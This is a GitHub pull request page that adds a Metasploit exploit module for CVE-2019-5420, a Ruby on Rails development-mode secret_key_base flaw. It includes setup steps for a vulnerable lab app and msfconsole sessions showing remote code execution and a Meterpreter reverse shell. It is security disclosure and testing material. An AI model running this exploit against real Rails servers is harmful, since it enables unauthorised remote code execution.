Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2019-5420 : Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability #11779

Merged
merged 6 commits into from May 1, 2019

Conversation

Projects
None yet
5 participants
@wchen-r7
Copy link
Contributor

commented Apr 25, 2019

Background

This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails application would use its name as the secret_key_base, and can be easily extracted by visiting an invalid resource for a path. As a result, this allows a remote user to create and deliver a signed serialized payload, load it by the application, and gain remote code execution.

Vulnerable Setup

In order to set up a vulnerable box for testing, do this on a Linux machine (such as Ubuntu), and assuming you already have rvm installed:

$ rvm gemset create test
$ rvm gemset use test
$ gem install rails '5.2.1'
$ rails new demo

Next, cd to demo, and then modify the Gemfile like this:

$ echo "gem 'rails', '5.2.1'" >> Gemfile
$ echo "gem 'sqlite3', '~> 1.3.6', '< 1.4'" >> Gemfile
$ echo "source 'https://rubygems.org'" >> Gemfile
$ bundle

Next, add a new controller:

rails generate controller metasploit

And add the index method for that controller (under app/controllers/metasploit_controllers.rb):

class MetasploitController < ApplicationController
  def index
    render file: "#{Rails.root}/test.html"
  end
end

In the root directory, add a new test.html:

echo Hello World > test.html

Also, add that new route in config/routes.rb:

Rails.application.routes.draw do
  resources :metasploit
end

And finally, start the application (since no mode is specified, by default, it is development mode):

rails s -b 0.0.0.0

Demo

msf5 exploit(multi/http/rails_double_tap) > check
[+] 172.16.249.141:3000 - The target is vulnerable.
msf5 exploit(multi/http/rails_double_tap) > exploit

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Attempting to retrieve the application name...
[*] The application name is: Demo
[*] Stager ready: 433 bytes
[*] Sending serialized payload to target (1250 bytes)
[*] Sending stage (985320 bytes) to 172.16.249.141
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:62572) at 2019-04-25 16:29:43 -0500
[+] Deleted /tmp/LsvSGK.bin
[+] Deleted /tmp/tSJfp.bin

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > pwd
/home/sinn3r/demo
meterpreter >
@wchen-r7

This comment has been minimized.

Copy link
Contributor Author

commented Apr 30, 2019

Thank you for the feedback. I think I have addressed all the ones mentioned above. Please let me know if there's any more.

@space-r7 space-r7 self-assigned this Apr 30, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented May 1, 2019

Tested on v5.2.1:

msf5 > use exploit/multi/http/rails_double_tap 
msf5 exploit(multi/http/rails_double_tap) > set rhosts 192.168.37.186
rhosts => 192.168.37.186
msf5 exploit(multi/http/rails_double_tap) > check
[+] 192.168.37.186:3000 - The target is vulnerable.
msf5 exploit(multi/http/rails_double_tap) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Attempting to retrieve the application name...
[*] The application name is: Demo
[*] Stager ready: 433 bytes
[*] Sending serialized payload to target (1250 bytes)
[*] Sending stage (985320 bytes) to 192.168.37.186
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.186:43798) at 2019-05-01 08:29:51 -0500
[+] Deleted /tmp/LxcZAf.bin
[+] Deleted /tmp/xdVrO.bin

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.186
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

@space-r7 space-r7 merged commit 1fd54e2 into rapid7:master May 1, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

space-r7 added a commit that referenced this pull request May 1, 2019

msjenkins-r7 added a commit that referenced this pull request May 1, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented May 1, 2019

Release Notes

The multi/http/rails_double_tap exploit module has been added to the framework. This module can predict the secret_key_base to a Ruby on Rails application while it is running in development mode and use the secret_key_base to generate a serialized payload. Sending that payload back to the Rails application can then result in remote code execution. This vulnerability exists for Rails versions 5.2.2 and below.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.